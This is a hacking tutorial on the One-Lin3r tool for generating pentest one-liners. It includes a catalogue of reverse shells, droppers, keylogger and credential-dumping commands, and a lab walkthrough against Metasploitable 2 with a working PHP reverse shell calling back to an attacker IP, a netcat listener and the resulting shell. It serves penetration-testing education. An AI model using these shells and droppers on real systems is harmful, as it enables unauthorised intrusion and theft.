How To: Use One-Lin3r to Quickly Generate Reverse Shells, Privesc Commands & More

Use One-Lin3r to Quickly Generate Reverse Shells, Privesc Commands & More

A lot of time can be wasted performing trivial tasks over and over again, and it's especially true when it comes to hacking and penetration testing. Trying different shells to own a target, and testing out privilege escalation commands afterward, can eat up a lot of time. Fortunately, there is a tool called One-Lin3r that can quickly generate shells, privesc commands, and more.

One-Lin3r is a Python tool that acts as a framework to automate the generation one-liners commonly used in pentesting and hacking. Its usage is very similar to Metasploit, so it's natural and simple to pick up for most people. The tool contains features such as auto-complete, search suggestion, automatic copying, and smart searching, making it a breeze to find whatever you're looking for.

In this tutorial, we will be using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup to follow along.

Installing & Basic Usage

The first thing we need to do is install One-Lin3r. It requires Python 3, so the easiest way to do this is with pip3. It will install the tool along with any dependencies it may need.

~# pip3 install one-lin3r

Collecting one-lin3r
  Downloading https://files.pythonhosted.org/packages/87/bc/603e4262e3e268e0e2ff54f7f87bbc638f5c4356f893396e2575379bc0cb/one_lin3r-2.0-py3-none-any.whl (100kB)
    100% |████████████████████████████████| 102kB 1.4MB/s
Collecting terminaltables (from one-lin3r)
  Downloading https://files.pythonhosted.org/packages/9b/c4/4a21174f32f8a7e1104798c445dacdc1d4df86f2f26722767034e4de4bff/terminaltables-3.1.0.tar.gz
Requirement already satisfied: pyperclip in /usr/lib/python3/dist-packages (from one-lin3r) (1.6.4)
Requirement already satisfied: prompt-toolkit in /usr/local/lib/python3.7/dist-packages (from one-lin3r) (2.0.9)
Requirement already satisfied: wcwidth in /usr/local/lib/python3.7/dist-packages (from prompt-toolkit->one-lin3r) (0.1.7)
Requirement already satisfied: six>=1.9.0 in /usr/lib/python3/dist-packages (from prompt-toolkit->one-lin3r) (1.12.0)
Installing collected packages: terminaltables, one-lin3r
  Running setup.py install for terminaltables ... done
Successfully installed one-lin3r-2.0 terminaltables-3.1.0

We can run the basic help menu by tacking on the -h flag:

~# one-lin3r -h

usage: One-Lin3r.py [-h] [-r R] [-x X] [-q]

optional arguments:
  -h, --help  show this help message and exit
  -r R        Execute a resource file.
  -x X        Execute a specific command (use ; for multiples).
  -q          Quiet mode (no banner).

One-Lin3r is a framework, so to really get into it, we need to start it up. Simply type one-lin3r in the terminal to do so:

~# one-lin3r

               zeeeeee-
              z$$$$$$"
             d$$$$$$"
            d$$$$$P
           d$$$$$P
          $$$$$$"
        .$$$$$$"
       .$$$$$$"
      4$$$$$$$$$$$$$"
     z$$$$$$$$$$$$$"
     """""""3$$$$$"
           z$$$$P
          d$$$$"        One-Lin3r By D4Vinci - V2.0
        .$$$$$"           A framework where all your liners belongs to...
       z$$$$$"              Loaded 155 liner(s).
      z$$$$P
     d$$$$$$$$$$"
    *******$$$"
         .$$$"
        .$$"
       4$P"
      z$"
     zP
    z"
   /
  ^

OneLiner >

Once it starts, we're greeted with a banner, much like what happens when starting the Metasploit Framework. In fact, most of the commands and usage of this tool are very similar to Metasploit, so most of us should feel right at home.

Typing help or ? will give us the detailed help menu:

OneLiner > ?

    Command                 Description
    --------                -------------
    help/?                  Show this help menu.
    list/show               List all one-liners in the database.
    search   [Keywords..]   Search database for a specific liner by its name, author name or description.
    use       <liner>       Use an available one-liner.
    copy      <liner>       Use an available one-liner and copy it to clipboard automatically.
    info      <liner>       Get information about an available liner.
    set <variable> <value>  Sets a context-specific variable to a value to use while using one-liners.
    variables               Prints all previously specified variables.
    banner                  Display banner.
    reload/refresh          Reload the liners database.
    check                   Prints the core version and checks if you are up-to-date.
    history                 Display command-line most important history from the beginning.
    makerc                  Save command-line history to a file.
    resource    <file>      Run the commands stored in a file
    os         <command>    Execute a system command without closing the framework
    exit/quit               Exit the framework

Since we are restricted to the framework prompt while running One-Lin3r, it's useful to be able to run operating system commands while working. Use the os keyword followed by whatever command you wish to run to do this:

OneLiner > os uname -a

Linux drd 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-5kali1 (2019-06-20) x86_64 GNU/Linux

We can use the list command to display all of the available one-liners the tool has to offer. It will list the names and associated functions of each one.

OneLiner > list

 #   | Name                                                        | Function
-----+-------------------------------------------------------------+---------------
 1   | multi/nmap/slowloris_attack                                 | Nmap script
 2   | multi/nmap/google_malware_check                             | Nmap script
 3   | multi/nmap/http_enumerate                                   | Nmap script
 4   | multi/nmap/full_vulnerability_scan                          | Nmap script
 5   | multi/nmap/common_malware_scan                              | Nmap script
 6   | multi/nmap/ftp_bruteforce                                   | Nmap script
 7   | openbsd/nc/bind_udp                                         | Bind Shell
 8   | openbsd/nc/reverse_tcp                                      | Reverse Shell
 9   | openbsd/bash/read_doas_config                               | PrivEsc
 10  | windows/scan/check_netapi                                   | Nmap script
 11  | windows/scan/check_eternal_blue                             | Nmap script
 12  | windows/python/bind_udp                                     | Bind Shell
 13  | windows/python/bind_tcp                                     | Bind Shell
 14  | windows/python/reverse_tcp                                  | Reverse Shell
 15  | windows/python/reverse_tcp_threaded                         | Reverse Shell
 16  | windows/php/bind_udp                                        | Bind Shell
 17  | windows/php/bind_tcp                                        | Bind Shell
 18  | windows/powershell/meterpreter_shell                        | Reverse Shell
 19  | windows/powershell/get_iis_config                           | PrivEsc
 20  | windows/powershell/bind_tcp                                 | Bind Shell
 21  | windows/powershell/ps1_dropper_microsoft_syncappv           | Dropper
 22  | windows/powershell/list_installed_programs_using_registry   | PrivEsc
 23  | windows/powershell/reverse_tcp                              | Reverse Shell
 24  | windows/powershell/setup_powerup_powertools                 | PrivEsc
 25  | windows/powershell/ps1_dropper                              | Dropper
 26  | windows/powershell/list_unqouted_services                   | PrivEsc
 27  | windows/powershell/get_saved_wifi_passwords                 | PrivEsc
 28  | windows/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc
 29  | windows/powershell/setup_keylogger_powersploit              | Keylogger
 30  | windows/powershell/list_running_processes                   | PrivEsc
 31  | windows/powershell/ps1_dropper_rundll32                     | Dropper
 32  | windows/powershell/list_scheduled_tasks                     | PrivEsc
 33  | windows/powershell/setup_session_gopher                     | PrivEsc
 34  | windows/powershell/reverse_tcp_string                       | Reverse Shell
 35  | windows/powershell/list_installed_programs_using_folders    | PrivEsc
 36  | windows/groovysh/reverse_tcp                                | Reverse Shell
 37  | windows/cmd/bat_dropper                                     | Dropper
 38  | windows/cmd/hta_dropper_mshta                               | Dropper
 39  | windows/cmd/list_logon_requirements                         | PrivEsc
 40  | windows/cmd/dll_dropper_rundll32                            | Dropper
 41  | windows/cmd/read_registry_vnc_passwords                     | PrivEsc
 42  | windows/cmd/read_registry_snmp_key                          | PrivEsc
 43  | windows/cmd/read_registry_run_key                           | PrivEsc
 44  | windows/cmd/read_registry_winlogon_key                      | PrivEsc
 45  | windows/cmd/read_registry_r_key                             | PrivEsc
 46  | windows/cmd/list_routing_tables                             | PrivEsc
 47  | windows/cmd/exe_dropper_certutil                            | Dropper
 48  | windows/cmd/list_startup_folder_currentuser                 | PrivEsc
 49  | windows/cmd/search_registry_for_passwords_cu                | PrivEsc
 50  | windows/cmd/list_network_interfaces                         | PrivEsc
 51  | windows/cmd/sct_dropper_rundll32                            | Dropper
 52  | windows/cmd/get_saved_wifi_aps_ssid                         | PrivEsc
 53  | windows/cmd/list_users                                      | PrivEsc
 54  | windows/cmd/read_registry_putty_sessions                    | PrivEsc
 55  | windows/cmd/get_systeminfo                                  | PrivEsc
 56  | windows/cmd/dll_dropper_regasm                              | Dropper
 57  | windows/cmd/list_startup_tasks_with_wmic                    | PrivEsc
 58  | windows/cmd/search_registry_for_passwords_lm                | PrivEsc
 59  | windows/cmd/execute_c#_files                                | Execute
 60  | windows/cmd/list_user_privileges                            | PrivEsc
 61  | windows/cmd/list_network_shares                             | PrivEsc
 62  | windows/cmd/search_for_passwords                            | PrivEsc
 63  | windows/cmd/read_services_with_tasklist                     | PrivEsc
 64  | windows/cmd/runas_with_creds                                | Execute
 65  | windows/cmd/list_unqouted_services                          | PrivEsc
 66  | windows/cmd/read_services_with_wmic                         | PrivEsc
 67  | windows/cmd/list_current_connections                        | PrivEsc
 68  | windows/cmd/get_saved_wifi_passwords                        | PrivEsc
 69  | windows/cmd/sct_dropper_mshta                               | Dropper
 70  | windows/cmd/read_registry_runonce_key                       | PrivEsc
 71  | windows/cmd/dll_dropper_certutil_base64                     | Dropper
 72  | windows/cmd/msi_quiet_installer                             | Execute
 73  | windows/cmd/list_startup_folder_allusers                    | PrivEsc
 74  | windows/cmd/sct_dropper_regsvr32                            | Dropper
 75  | windows/cmd/list_drives                                     | PrivEsc
 76  | windows/cmd/msi_dropper_wininstaller                        | Dropper
 77  | windows/cmd/list_installed_updates                          | PrivEsc
 78  | windows/cmd/list_localgroups                                | PrivEsc
 79  | windows/cmd/list_running_processes                          | PrivEsc
 80  | windows/cmd/read_firewall_config                            | PrivEsc
 81  | windows/cmd/list_arp_tables                                 | PrivEsc
 82  | windows/cmd/xsl_dropper_wmic                                | Dropper
 83  | windows/cmd/list_scheduled_tasks                            | PrivEsc
 84  | windows/cmd/execute_over_forfiles                           | Execute
 85  | windows/cmd/list_processes_running_as_system                | PrivEsc
 86  | windows/cmd/read_registry_always_install_elevated_key_cu    | PrivEsc
 87  | windows/cmd/exe_dropper_bitsadmin                           | Dropper
 88  | windows/cmd/dll_loader_control_panel                        | Loader
 89  | windows/cmd/win_remote_management                           | Execute
 90  | windows/cmd/dll_loader_word                                 | Loader
 91  | windows/cmd/read_registry_always_install_elevated_key_lm    | PrivEsc
 92  | windows/cmd/get_snmp_config                                 | PrivEsc
 93  | windows/cmd/get_architecture                                | PrivEsc
 94  | windows/nc/bind_tcp                                         | Bind Shell
 95  | windows/nc/reverse_tcp                                      | Reverse Shell
 96  | windows/lua/reverse_tcp                                     | Reverse Shell
 97  | windows/perl/bind_udp                                       | Bind Shell
 98  | windows/perl/bind_tcp                                       | Bind Shell
 99  | windows/perl/reverse_tcp                                    | Reverse Shell
 100 | windows/ruby/bind_udp                                       | Bind Shell
 101 | windows/ruby/bind_tcp                                       | Bind Shell
 102 | windows/ruby/reverse_tcp                                    | Reverse Shell
 103 | linux/awk/bind_tcp                                          | Bind Shell
 104 | linux/awk/reverse_tcp                                       | Reverse Shell
 105 | linux/awk/reverse_udp                                       | Reverse Shell
 106 | linux/java/reverse_tcp                                      | Reverse Shell
 107 | linux/go/reverse_tcp                                        | Reverse Shell
 108 | linux/python/bind_udp                                       | Bind Shell
 109 | linux/python/bind_tcp                                       | Bind Shell
 110 | linux/python/reverse_tcp                                    | Reverse Shell
 111 | linux/python/reverse_tcp_interactive                        | Reverse Shell
 112 | linux/python/reverse_udp                                    | Reverse Shell
 113 | linux/php/bind_udp                                          | Bind Shell
 114 | linux/php/bind_tcp                                          | Bind Shell
 115 | linux/php/reverse_tcp                                       | Reverse Shell
 116 | linux/openssl/reverse_tcp                                   | Reverse Shell
 117 | linux/ncat/reverse_tcp_ssl                                  | Reverse Shell
 118 | linux/ncat/reverse_tcp                                      | Reverse Shell
 119 | linux/ncat/reverse_udp                                      | Reverse Shell
 120 | linux/socat/bind_udp                                        | Bind Shell
 121 | linux/socat/reverse_tcp                                     | Reverse Shell
 122 | linux/tclsh/reverse_tcp                                     | Reverse Shell
 123 | linux/nodejs/reverse_tcp                                    | Reverse Shell
 124 | linux/nc/reverse_tcp_mkfifo                                 | Reverse Shell
 125 | linux/nc/bind_tcp                                           | Bind Shell
 126 | linux/nc/reverse_tcp_mknod                                  | Reverse Shell
 127 | linux/nc/bind_tcp_mkfifo                                    | Bind Shell
 128 | linux/nc/reverse_tcp                                        | Reverse Shell
 129 | linux/nc/reverse_udp                                        | Reverse Shell
 130 | linux/lua/reverse_tcp                                       | Reverse Shell
 131 | linux/lua/reverse_tcp_bash                                  | Reverse Shell
 132 | linux/perl/bind_udp                                         | Bind Shell
 133 | linux/perl/reverse_udp_miosocket                            | Reverse Shell
 134 | linux/perl/bind_tcp                                         | Bind Shell
 135 | linux/perl/reverse_tcp                                      | Reverse Shell
 136 | linux/perl/reverse_tcp_miosocket                            | Reverse Shell
 137 | linux/telnet/reverse_tcp_mkfifo                             | Reverse Shell
 138 | linux/telnet/reverse_tcp_mknod                              | Reverse Shell
 139 | linux/ruby/bind_udp                                         | Bind Shell
 140 | linux/ruby/bind_tcp                                         | Bind Shell
 141 | linux/ruby/reverse_tcp                                      | Reverse Shell
 142 | linux/bash/list_cronjobs_for_another_user                   | PrivEsc
 143 | linux/bash/list_cronjobs_for_current_user                   | PrivEsc
 144 | linux/bash/list_all_capabilities                            | PrivEsc
 145 | linux/bash/reverse_tcp                                      | Reverse Shell
 146 | linux/bash/exploit_docker_bash_container                    | PrivEsc
 147 | linux/bash/search_for_password_using_grep                   | PrivEsc
 148 | linux/bash/search_for_password_using_find                   | PrivEsc
 149 | linux/bash/search_for_password_in_memory                    | PrivEsc
 150 | linux/bash/exploit_writeable_sudoers                        | PrivEsc
 151 | linux/bash/find_suid                                        | PrivEsc
 152 | linux/bash/reverse_tcp_exec                                 | Reverse Shell
 153 | linux/bash/list_cronjobs_for_all_users                      | PrivEsc
 154 | linux/bash/list_systemd_timers                              | PrivEsc
 155 | linux/bash/get_last_edited_files                            | PrivEsc

We can also search for specific items using the search command. This is something that One-Lin3r is really good at. It not only has auto-complete capabilities, but it also knows what you are trying to search for by offering suggestions and allowing partial search terms.

For instance, let's say we wanted some kind of PHP shell for Linux. We don't need to type the full path for the tool to find what we are looking for.

OneLiner > search linux php

 #   | Name                  | Function
-----+-----------------------+---------------
 1   | linux/php/bind_udp    | Bind Shell
 2   | linux/php/bind_tcp    | Bind Shell
 3   | linux/php/reverse_tcp | Reverse Shell

We can get information about a specific one-liner with the info command, which will give us a short description of the item, including its author, function, and variables that are used.

OneLiner > info linux/php/reverse_tcp

[+] Liner added by => vesche
[+] Function       => Reverse Shell
[+] Variables used => TARGET, PORT
[+] Description    => Uses PHP sockets & exec to create a reverse shell.

Reverse Shell Example

Once we've found a suitable item, we can load it with the use command:

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

Once we do this, it will give us the actual line that we need to copy and run. In this example, we can see there are parameters for the target and port. To display current variables and their associated values, simply type variables at the prompt:

OneLiner > variables

 # | Name      | Value
---+-----------+-------
 1 | TARGET    | None
 2 | PORT      | None
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Now we are able to set values for these variables, much like how we do in Metasploit. Since we are generating a reverse shell here, we need to set the target to the IP address of our local machine:

OneLiner > set target 10.10.0.1

[+] Variable target set to 10.10.0.1

And the desired port so it can connect back to our listener:

OneLiner > set port 4321

[+] Variable port set to 4321

Now when we display the variables again, we can see that our values are set:

OneLiner > variables

 # | Name      | Value
---+-----------+-----------
 1 | TARGET    | 10.10.0.1
 2 | PORT      | 4321
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Let's try this out. First, we need to set up a listener so we can catch the incoming connection from the target. Netcat is always a good choice:

~# nc -lvp 4321

listening on [any] 4321 ...

Next, load the one-liner to get the full command. We can see that the target and port variables are now filled in with our values:

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'

We could just copy this command like normal, but One-Lin3r actually has a feature to automate this for us. Instead of loading an item with the use command, load it with the copy command — this will automatically copy what we need right to the clipboard:

OneLiner > copy linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
[+] Liner copied to clipboard successfully!

From here, it's time to exploit the target. Feel free to do this however you want, but command injection is always a favorite of mine. Once we exploit the target and run our reverse shell command, we should see a connection open up on our local machine:

10.10.0.50: inverse host lookup failed: Unknown host
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 56718
sh: no job control in this shell
sh-3.2$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can now run commands like id to verify we have compromised a user on the system.

Privesc Example

Now that we have a shell on the system as a limited user, the next step to take would be privilege escalation. Fortunately, One-Lin3r also contains some handy privesc commands for us to generate.

First things first, let's upgrade this shell we have to a fully interactive TTY session so we have more control over what we're doing.

Now that we have a decent shell, let's find a potential privesc command to use. I usually like to work out of a world-writable directory during post-exploitation so I can write and execute whatever I want — /var/tmp is a good bet:

www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp

Now, back in One-Lin3r, we can search for an appropriate privesc for Linux:

OneLiner > search linux privesc

 #   | Name                                      | Function
-----+-------------------------------------------+----------
 1   | linux/bash/list_cronjobs_for_another_user | PrivEsc
 2   | linux/bash/list_cronjobs_for_current_user | PrivEsc
 3   | linux/bash/list_all_capabilities          | PrivEsc
 4   | linux/bash/exploit_docker_bash_container  | PrivEsc
 5   | linux/bash/search_for_password_using_grep | PrivEsc
 6   | linux/bash/search_for_password_using_find | PrivEsc
 7   | linux/bash/search_for_password_in_memory  | PrivEsc
 8   | linux/bash/exploit_writeable_sudoers      | PrivEsc
 9   | linux/bash/find_suid                      | PrivEsc
 10  | linux/bash/list_cronjobs_for_all_users    | PrivEsc
 11  | linux/bash/list_systemd_timers            | PrivEsc
 12  | linux/bash/get_last_edited_files          | PrivEsc

Let's take a look at this one, which will list any cron jobs for the current user:

OneLiner > info linux/bash/list_cronjobs_for_current_user

[+] Liner added by => Karim shoair (D4Vinci)
[+] Function       => PrivEsc
[+] Variables used => None
[+] Description    => List all crob jobs for current user

Seems pretty straightforward, and we don't even need to set any variables. Use the copy command to copy it straight to the clipboard:

OneLiner > copy linux/bash/list_cronjobs_for_current_user

[+] Your liner is: crontab -l
[+] Liner copied to clipboard successfully!

We can see it still tells us what it generates, but we save an extra step by copying the command automatically. The only thing left to do is run the one-liner on the target:

www-data@metasploitable:/var/tmp$ crontab -l

no crontab for www-data

We can see in this particular instance there are no cron jobs for this user, but One-Lin3r makes it easy to have some common privesc commands right at our fingertips.

Wrapping Up

Today, we explored a tool called One-Lin3r and how to use it to quickly generate shells, privilege escalation commands, and more. We tested it out by using a PHP reverse shell to compromise the target, then tried to escalate privileges by generating a command to check for cron jobs. With an interface that feels familiar to any Metasploit user, One-Lin3r makes it easy to hack on the fly.

Start your White-Hat Hacker journey with Null Byte's Beginner's Guide to Mastering Linux eBook.

Buy Now for $29.99 >

Cover image by EVG photos/Pexels; Screenshots by drd_/Null Byte

Never Miss a Hacking or Security Guide

Get new Null Byte guides every week.

Be the First to Comment

Share Your Thoughts

  • Hot
  • Latest